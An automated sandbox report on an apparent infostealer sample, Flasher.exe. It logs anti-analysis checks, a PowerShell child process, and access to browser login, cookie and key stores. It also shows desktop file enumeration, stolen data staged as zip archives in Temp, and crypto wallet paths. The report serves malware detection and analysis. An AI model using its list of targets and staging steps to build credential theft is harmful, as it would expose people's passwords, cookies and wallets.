                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3328Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2678Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-90215
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 3328 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 2678 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                Source: C:\Users\user\Desktop\Flasher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35DF7C0 CloseHandle,memset,FindFirstFileW,FindClose,HeapFree,0_2_00007FF6D35DF7C0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D371D91C memset,GetSystemInfo,0_2_00007FF6D371D91C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Flasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D373885F GetProcessHeap,HeapAlloc,0_2_00007FF6D373885F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D37328B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6D37328B0
                Source: C:\Users\user\Desktop\Flasher.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352257A memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,WaitForSingleObject,GetLastError,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,memmove,AllocateAndInitializeSid,memmove,memmove,memmove,memmove,EnumDisplayMonitors,CloseHandle,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,0_2_00007FF6D352257A
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\DVWHKMNFNN.jpg VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\Flasher.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.mp3 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.png VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.jpg VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.png VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\DTBZGIOOSO.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\DVWHKMNFNN.jpg VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.png VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\VLZDGUKUTZ.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG.xlsx VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.jpg VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352257A memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,WaitForSingleObject,GetLastError,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,memmove,AllocateAndInitializeSid,memmove,memmove,memmove,memmove,EnumDisplayMonitors,CloseHandle,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,0_2_00007FF6D352257A
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352257A memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,WaitForSingleObject,GetLastError,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,memmove,AllocateAndInitializeSid,memmove,memmove,memmove,memmove,EnumDisplayMonitors,CloseHandle,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,0_2_00007FF6D352257A
                Source: C:\Users\user\Desktop\Flasher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Flasher.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\ata0
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\ata0
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE77921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Wallets\Jaxx\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\mnal
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                Source: Flasher.exe, 00000000.00000003.1759114895.000001EE7792E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_0\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886963547611\Login DataJump to behavior
